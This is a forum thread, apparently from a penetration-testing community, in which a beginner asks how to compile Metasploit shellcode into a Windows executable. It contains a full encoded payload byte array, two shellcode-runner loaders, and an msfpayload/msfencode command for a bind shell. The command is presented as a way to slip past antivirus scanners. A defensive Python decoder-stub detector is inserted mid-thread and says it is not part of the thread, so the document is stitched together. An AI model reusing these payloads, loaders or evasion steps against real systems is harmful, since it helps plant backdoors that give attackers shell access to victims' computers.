Thread: Compile Metasploit payload in C/C++ How?

  1. #1
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    3

    Compile Metasploit payload in C/C++ How?

    Hello,

    I'm a noob at compiling a Metasploit-generated payload in C format and building it with any Windows C/C++ compiler. I tried it in MinGW, Borland and Visual C, using this method...

    1. I generate the Metasploit payload in C format; the output is the unsigned char buf[] array that appears in the code below.


    and copy it, then paste it into <framework32>/data/templates/template.c

    but I don't know where to insert it, so I tried this method:
    #include <stdio.h>

    unsigned char payload[] =
    "\xdb\xc5\xd9\x74\x24\xf4\x29\xc9\x5f\xbd\x14\x21\ x6c\xf7\xb1"
    "\x45\x83\xc7\x04\x31\x6f\x16\x03\x6f\x16\xe2\xe1\ xdd\x84\x7e"
    "\x09\x1e\x55\xe1\x80\xfb\x64\x33\xf6\x88\xd5\x83\ x7d\xdc\xd5"
    "\x68\xd3\xf5\x6e\x1c\xfb\xfa\xc7\xab\xdd\x35\xd7\ x1d\xe1\x9a"
    "\x1b\x3f\x9d\xe0\x4f\x9f\x9c\x2a\x82\xde\xd9\x57\ x6d\xb2\xb2"
    "\x1c\xdc\x23\xb7\x61\xdd\x42\x17\xee\x5d\x3d\x12\ x31\x29\xf7"
    "\x1d\x62\x82\x8c\x55\x9a\xa8\xcb\x45\x9b\x7d\x08\ xb9\xd2\x0a"
    "\xfb\x4a\xe5\xda\x35\xb3\xd7\x22\x99\x8a\xd7\xae\ xe3\xcb\xd0"
    "\x50\x96\x27\x23\xec\xa1\xfc\x59\x2a\x27\xe0\xfa\ xb9\x9f\xc0"
    "\xfb\x6e\x79\x83\xf0\xdb\x0d\xcb\x14\xdd\xc2\x60\ x20\x56\xe5"
    "\xa6\xa0\x2c\xc2\x62\xe8\xf7\x6b\x33\x54\x59\x93\ x23\x30\x06"
    "\x31\x28\xd3\x53\x43\x73\xbc\x90\x7e\x8b\x3c\xbf\ x09\xf8\x0e"
    "\x60\xa2\x96\x22\xe9\x6c\x61\x44\xc0\xc9\xfd\xbb\ xeb\x29\xd4"
    "\x7f\xbf\x79\x4e\xa9\xc0\x11\x8e\x56\x15\xb5\xde\ xf8\xc6\x76"
    "\x8e\xb8\xb6\x1e\xc4\x36\xe8\x3f\xe7\x9c\x9f\x07\ x7f\xdf\x08"
    "\x86\xf5\xb7\x4a\x89\x1c\xfb\xc2\x6f\x74\xeb\x82\ x38\xe0\x92"
    "\x8e\xb3\x91\x5b\x05\x51\x51\xce\xa2\xf0\x06\x66\ xa9\x25\x60"
    "\x29\x52\x00\xfb\xe0\xc6\xeb\x93\x0c\x07\xec\x63\ x5b\x4d\xec"
    "\x0b\x3b\x35\xbf\x2e\x44\xe0\xc9\x73\xe8\x61\xca\ x25\x5c\x21"
    "\xa2\xcb\xbb\x05\x6d\x34\xee\x97\x51\xe3\xd7\x1d\ xa3\x86\x3b"
    "\xde\x46";
    int main(int argc, char **argv)
    {
        /* cast the byte buffer to a function pointer and call it */
        (*(void (*)()) payload)();
        return 0;
    }
    I changed "unsigned char buf[]" to "unsigned char payload[]".
    It compiled successfully, but the problem is there is a warning: "no newline at end of file". And when I tried to run it... it connects but it stops at "Uploading DLL". Can someone help me with this? I'm totally a noob... and trying to learn. I'm trying to create/modify the code and compile my own. Thank you very much....

  2. #2
    Gitsnik (Very good friend of the forum)
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Try not using the meterpreter payload and see how that goes for you.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  3. #3
    Member
    Join Date
    Jan 2010
    Location
    The new forums
    Posts
    462

    What are you trying to do? Are you wanting to create a payload from msfpayload in C and add it to a public exploit, or your exploit?

    ex: You found an exploit on milw0rm but want to change the payload.

    Some good info on this thread: http://forums.remote-exploit.org/pen...shellcode.html

  4. #4
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    3

    Quote Originally Posted by Lincoln
    What are you trying to do? Are you wanting to create a payload from msfpayload in C and add it to a public exploit, or your exploit?
    Sort of, I think... I generate an MSF payload through msfencode and the output is in C, not EXE, so that I can compile it on my own. I got this idea from the following:

    So, I've seen a few articles from pauldotcom (except ours will work encoded) and SANS covering sending a Metasploit payload through scanners and some of the mileage people are seeing. Most have gotten down to around 6 of 36 listed on virustotal.com. I thought I'd give it a go and see for myself. Here's how I got detected by 1 of 36 in one turn.

    Now we use msfpayload piped to msfencode with the ever so popular x86/shikata_ga_nai encoder:
    Code:
    ./msfpayload windows/shell_bind_tcp LPORT=30000 R | ./msfencode -e x86/shikata_ga_nai c > ~/binder.c

    Now we have our bind shell encoded and waiting in binder.c. From here, you can simply cut and paste this code straight into <framework32>/data/templates/template.c

    Finally, we compile that into a Windows executable using Mingw32. Uploading this to virustotal.com showed that AVG was the only scanner to detect our payload.

  5. #5
    Member
    Join Date
    Jan 2010
    Location
    The new forums
    Posts
    462

    Quote Originally Posted by yyyx_yyyz
    Finally, we compile that into a windows executable using Mingw32
    For the cross compiling check out the last video.

    Up and Running Backtrack 4 - Offensive Security

  6. #6
    lupin (Super Moderator)
    Join Date
    Jan 2010
    Posts
    2,943

    Quote Originally Posted by yyyx_yyyz
    Sort of, I think... I generate an MSF payload through msfencode and the output is in C, not EXE, so that I can compile it on my own. I got this idea from the following:
    What you are seeing in the output of the Metasploit command is a C-style buffer full of assembly opcodes: it's shellcode. You won't be able to change what the payload actually does unless you disassemble the shellcode and modify it in assembler.

    That warning you were getting about "no newline at end of file" isn't serious; it's a "warning", which does not stop compilation, as opposed to an "error", which does. You fix it by putting a newline at the end of your C source file.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.
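As an added example (not from this thread, Metasploit or any poster) of what lupin's "buffer full of opcodes" means in practice, here is the analyst's side: parse the C-format dump back into bytes, then look for the fnstenv-based GetPC sequence and the key/count immediates that an x86/shikata_ga_nai decoder stub carries in front of the encoded payload. The sample is constructed from the first two lines of the dump posted above, stray space included, because a space between the backslash and the x is not a valid C hex escape, so the parser tolerates it; the opcode walk is a heuristic for stubs that set the counter with mov cl, imm8.

```python
import re
import struct

# Constructed sample: the first two lines of the msfencode C-format dump posted in
# this thread, including the stray space in "\ x6c" that the forum inserted.
SAMPLE_C_OUTPUT = r'''unsigned char buf[] =
"\xdb\xc5\xd9\x74\x24\xf4\x29\xc9\x5f\xbd\x14\x21\ x6c\xf7\xb1"
"\x45\x83\xc7\x04\x31\x6f\x16\x03\x6f\x16\xe2\xe1\ xdd\x84\x7e";'''

# A backslash, optional whitespace (wrapping artifact), 'x' and two hex digits.
HEX_ESCAPE = re.compile(r"\\\s*x([0-9a-fA-F]{2})")

# fnstenv [esp-0xc]: the GetPC trick the shikata_ga_nai decoder stub relies on.
FNSTENV_GETPC = b"\xd9\x74\x24\xf4"


def c_buffer_to_bytes(text):
    """Turn a C-format payload dump back into the raw bytes it represents."""
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(text))


def find_fnstenv_getpc(code, window=32):
    """Offset of the fnstenv GetPC sequence in the first `window` bytes, or -1."""
    return code.find(FNSTENV_GETPC, 0, window)


def parse_shikata_stub(code):
    """Extract XOR key and dword count from a shikata_ga_nai-style decoder stub.

    After GetPC we expect, in any order: pop reg32, sub/xor ecx,ecx,
    mov reg32,imm32 (the key) and mov cl,imm8 (the count). None if no match.
    """
    getpc = find_fnstenv_getpc(code)
    if getpc < 0:
        return None
    pos, key, count = getpc + len(FNSTENV_GETPC), None, None
    while pos < len(code) and (key is None or count is None):
        op = code[pos]
        if 0x58 <= op <= 0x5F:                                        # pop reg32
            pos += 1
        elif op in (0x29, 0x31) and code[pos + 1:pos + 2] == b"\xc9":  # sub/xor ecx,ecx
            pos += 2
        elif 0xB8 <= op <= 0xBF and pos + 5 <= len(code):             # mov reg32, imm32
            key = struct.unpack_from("<I", code, pos + 1)[0]
            pos += 5
        elif op == 0xB1 and pos + 2 <= len(code):                     # mov cl, imm8
            count = code[pos + 1]
            pos += 2
        else:
            break
    if key is None or count is None:
        return None
    return {"getpc_offset": getpc, "key": key, "dwords": count, "encoded_bytes": count * 4}
```

Run against the full 302-byte dump in this thread, the 69 dwords the stub reports cover exactly the 276 bytes from the loop instruction's displacement byte (offset 26) to the end, which is how this stub decodes its own jump target first.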

  7. #7
    Junior Member
    Join Date
    Jan 2010
    Location
    Canada
    Posts
    84

    No big deal, what you are missing is that shellcode is a self-sustained chunk of opcodes that, although it runs fine when it gets executed bit by bit, isn't meant to be run as a full program. You have two options if you want to pursue this, the hard way and the easy way.

    The hard way involves editing the shellcode into a full-fledged ASM program.

    The easy way involves letting the compiler do the work by using the exece() call or by putting the shellcode (once it's back in ASM form) in an _asm brace.

  8. #8
    lupin (Super Moderator)
    Join Date
    Jan 2010
    Posts
    2,943

    You can also try using the following C code to turn your shellcode into an executable (taken from the Metasploit Windows shellcode site). However (and this is the point I was trying to make before), you're not really gaining anything by creating the code in C format from Metasploit and then compiling it into a Windows executable UNLESS you go about changing the shellcode in assembler before you compile. And if you want to learn assembler, there are better approaches to learning it than this.

    Alternatively, if you want to learn how to write this type of code in C, start off with a program that's actually written in C.

    Code:
    char shellcode[] =
    "<code_here>";

    int main(int argc, char **argv)
    {
      /* treat the byte buffer as a function and call it */
      int (*funct)();
      funct = (int (*)()) shellcode;
      (int)(*funct)();
      return 0;
    }

  9. #9
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    3

    Thanks for the reply and advice.... Now I've started to research all the advice given here... this is really not easy for me... especially assembly... God bless me....